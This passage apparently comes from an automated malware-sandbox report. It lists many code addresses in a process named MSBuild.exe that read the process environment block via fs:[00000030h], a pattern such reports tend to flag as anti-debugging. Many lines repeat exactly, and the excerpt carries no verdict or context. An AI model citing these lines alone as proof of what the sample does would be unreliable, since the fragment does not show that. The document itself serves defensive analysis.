                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E388 mov eax, dword ptr fs:[00000030h]5_2_0110E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E388 mov eax, dword ptr fs:[00000030h]5_2_0110E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E388 mov eax, dword ptr fs:[00000030h]5_2_0110E388
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113438F mov eax, dword ptr fs:[00000030h]5_2_0113438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113438F mov eax, dword ptr fs:[00000030h]5_2_0113438F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov eax, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov eax, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov ecx, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011BE3DB mov eax, dword ptr fs:[00000030h]5_2_011BE3DB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B43D4 mov eax, dword ptr fs:[00000030h]5_2_011B43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011B43D4 mov eax, dword ptr fs:[00000030h]5_2_011B43D4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CC3CD mov eax, dword ptr fs:[00000030h]5_2_011CC3CD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A3C0 mov eax, dword ptr fs:[00000030h]5_2_0111A3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011183C0 mov eax, dword ptr fs:[00000030h]5_2_011183C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011963C0 mov eax, dword ptr fs:[00000030h]5_2_011963C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F0 mov eax, dword ptr fs:[00000030h]5_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F0 mov eax, dword ptr fs:[00000030h]5_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0112E3F0 mov eax, dword ptr fs:[00000030h]5_2_0112E3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011463FF mov eax, dword ptr fs:[00000030h]5_2_011463FF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011203E9 mov eax, dword ptr fs:[00000030h]5_2_011203E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110823B mov eax, dword ptr fs:[00000030h]5_2_0110823B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110A250 mov eax, dword ptr fs:[00000030h]5_2_0110A250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E625D mov eax, dword ptr fs:[00000030h]5_2_011E625D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01116259 mov eax, dword ptr fs:[00000030h]5_2_01116259
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA250 mov eax, dword ptr fs:[00000030h]5_2_011CA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA250 mov eax, dword ptr fs:[00000030h]5_2_011CA250
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01198243 mov eax, dword ptr fs:[00000030h]5_2_01198243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01198243 mov ecx, dword ptr fs:[00000030h]5_2_01198243
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011C0274 mov eax, dword ptr fs:[00000030h]5_2_011C0274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114260 mov eax, dword ptr fs:[00000030h]5_2_01114260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114260 mov eax, dword ptr fs:[00000030h]5_2_01114260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01114260 mov eax, dword ptr fs:[00000030h]5_2_01114260
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110826B mov eax, dword ptr fs:[00000030h]5_2_0110826B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E284 mov eax, dword ptr fs:[00000030h]5_2_0114E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E284 mov eax, dword ptr fs:[00000030h]5_2_0114E284
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190283 mov eax, dword ptr fs:[00000030h]5_2_01190283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190283 mov eax, dword ptr fs:[00000030h]5_2_01190283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01190283 mov eax, dword ptr fs:[00000030h]5_2_01190283
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202A0 mov eax, dword ptr fs:[00000030h]5_2_011202A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202A0 mov eax, dword ptr fs:[00000030h]5_2_011202A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov ecx, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A62A0 mov eax, dword ptr fs:[00000030h]5_2_011A62A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E62D6 mov eax, dword ptr fs:[00000030h]5_2_011E62D6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0111A2C3 mov eax, dword ptr fs:[00000030h]5_2_0111A2C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202E1 mov eax, dword ptr fs:[00000030h]5_2_011202E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202E1 mov eax, dword ptr fs:[00000030h]5_2_011202E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011202E1 mov eax, dword ptr fs:[00000030h]5_2_011202E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011A6500 mov eax, dword ptr fs:[00000030h]5_2_011A6500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011E4500 mov eax, dword ptr fs:[00000030h]5_2_011E4500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01120535 mov eax, dword ptr fs:[00000030h]5_2_01120535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E53E mov eax, dword ptr fs:[00000030h]5_2_0113E53E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118550 mov eax, dword ptr fs:[00000030h]5_2_01118550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118550 mov eax, dword ptr fs:[00000030h]5_2_01118550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114656A mov eax, dword ptr fs:[00000030h]5_2_0114656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114656A mov eax, dword ptr fs:[00000030h]5_2_0114656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114656A mov eax, dword ptr fs:[00000030h]5_2_0114656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E59C mov eax, dword ptr fs:[00000030h]5_2_0114E59C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112582 mov eax, dword ptr fs:[00000030h]5_2_01112582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01112582 mov ecx, dword ptr fs:[00000030h]5_2_01112582
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01144588 mov eax, dword ptr fs:[00000030h]5_2_01144588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011345B1 mov eax, dword ptr fs:[00000030h]5_2_011345B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011345B1 mov eax, dword ptr fs:[00000030h]5_2_011345B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011905A7 mov eax, dword ptr fs:[00000030h]5_2_011905A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011905A7 mov eax, dword ptr fs:[00000030h]5_2_011905A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011905A7 mov eax, dword ptr fs:[00000030h]5_2_011905A7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011165D0 mov eax, dword ptr fs:[00000030h]5_2_011165D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A5D0 mov eax, dword ptr fs:[00000030h]5_2_0114A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114A5D0 mov eax, dword ptr fs:[00000030h]5_2_0114A5D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E5CF mov eax, dword ptr fs:[00000030h]5_2_0114E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E5CF mov eax, dword ptr fs:[00000030h]5_2_0114E5CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011125E0 mov eax, dword ptr fs:[00000030h]5_2_011125E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113E5E7 mov eax, dword ptr fs:[00000030h]5_2_0113E5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C5ED mov eax, dword ptr fs:[00000030h]5_2_0114C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C5ED mov eax, dword ptr fs:[00000030h]5_2_0114C5ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148402 mov eax, dword ptr fs:[00000030h]5_2_01148402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148402 mov eax, dword ptr fs:[00000030h]5_2_01148402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01148402 mov eax, dword ptr fs:[00000030h]5_2_01148402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E420 mov eax, dword ptr fs:[00000030h]5_2_0110E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E420 mov eax, dword ptr fs:[00000030h]5_2_0110E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110E420 mov eax, dword ptr fs:[00000030h]5_2_0110E420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110C427 mov eax, dword ptr fs:[00000030h]5_2_0110C427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01196420 mov eax, dword ptr fs:[00000030h]5_2_01196420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113245A mov eax, dword ptr fs:[00000030h]5_2_0113245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA456 mov eax, dword ptr fs:[00000030h]5_2_011CA456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0110645D mov eax, dword ptr fs:[00000030h]5_2_0110645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114E443 mov eax, dword ptr fs:[00000030h]5_2_0114E443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113A470 mov eax, dword ptr fs:[00000030h]5_2_0113A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113A470 mov eax, dword ptr fs:[00000030h]5_2_0113A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0113A470 mov eax, dword ptr fs:[00000030h]5_2_0113A470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119C460 mov ecx, dword ptr fs:[00000030h]5_2_0119C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011CA49A mov eax, dword ptr fs:[00000030h]5_2_011CA49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011444B0 mov ecx, dword ptr fs:[00000030h]5_2_011444B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119A4B0 mov eax, dword ptr fs:[00000030h]5_2_0119A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011164AB mov eax, dword ptr fs:[00000030h]5_2_011164AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_011104E5 mov ecx, dword ptr fs:[00000030h]5_2_011104E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110710 mov eax, dword ptr fs:[00000030h]5_2_01110710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01140710 mov eax, dword ptr fs:[00000030h]5_2_01140710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C700 mov eax, dword ptr fs:[00000030h]5_2_0114C700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114273C mov eax, dword ptr fs:[00000030h]5_2_0114273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114273C mov ecx, dword ptr fs:[00000030h]5_2_0114273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114273C mov eax, dword ptr fs:[00000030h]5_2_0114273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0118C730 mov eax, dword ptr fs:[00000030h]5_2_0118C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C720 mov eax, dword ptr fs:[00000030h]5_2_0114C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114C720 mov eax, dword ptr fs:[00000030h]5_2_0114C720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01110750 mov eax, dword ptr fs:[00000030h]5_2_01110750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0119E75D mov eax, dword ptr fs:[00000030h]5_2_0119E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152750 mov eax, dword ptr fs:[00000030h]5_2_01152750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01152750 mov eax, dword ptr fs:[00000030h]5_2_01152750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01194755 mov eax, dword ptr fs:[00000030h]5_2_01194755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114674D mov esi, dword ptr fs:[00000030h]5_2_0114674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114674D mov eax, dword ptr fs:[00000030h]5_2_0114674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_0114674D mov eax, dword ptr fs:[00000030h]5_2_0114674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 5_2_01118770 mov eax, dword ptr fs:[00000030h]5_2_01118770
